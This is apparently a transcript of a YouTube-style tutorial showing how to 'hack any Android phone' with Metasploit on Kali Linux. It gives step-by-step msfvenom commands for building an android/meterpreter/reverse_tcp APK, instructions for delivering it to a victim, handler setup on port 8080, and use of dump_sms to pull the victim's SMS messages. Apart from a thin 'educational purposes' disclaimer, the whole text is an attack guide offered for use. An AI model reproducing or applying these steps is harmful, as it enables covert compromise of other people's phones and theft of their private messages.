All the content shown in this video is only for educational purposes. Any misuse of this content is completely at your own risk. Do not try to attempt to break laws or do any illegal stuff by using this. We aren't responsible.
Guys, today I am going to show you that how to hack any Android phone using METASPLOIT tool in Kali Linux. So let's open the METASPLOIT. So, let's create a payload for victim by using msfvenom tool, which will be sent to the victim. Type msfvenom p android/meterpreter/reverse_tcp lhost equals your IP address, lport equals the port. Which one should be used are HakiT.apk to know your IP address. Now cut the HakiT.apk from home directory and paste it in /www/html. Now open another tab or window and type service Apache to start the Apache server or send HakiT.apk to the victim by using any source. And in Metasploit tab type use exploit/multi/handler and press enter. Now type set payload android/meterpreter/reverse_tcp and hit enter. Now type lhost your IP address, which you have selected from ifconfig tab. Now type set lport and the port which should be used. I am selecting 8080. Now in the last, type exploit and hit enter, to start listner. If victim installs the payload then a meterpreter session will be opened. Now just wait for a couple of seconds. See, meterpreter session has arrived. Here we can execute a lot of commands by which we can fetch data and we can also send any kind of data on victim device. Now type help to see the list of commands which can be executed. Let's try dump_sms and see what happens. See, it has collected all SMS from victim device and saved them in home directory. Let's see, is there any new file there? As you can see, here is a txt file named as sms_dump and several numbers. In the same way you can execute all of these commands. Let's test another command and see, everything is working perfectly and we have completely hacked our victim's device. I hope you enjoyed the video. I hope that you won't forget to like, subscribe and comment, because I'm going to upload a lot of new hacking and technology related videos.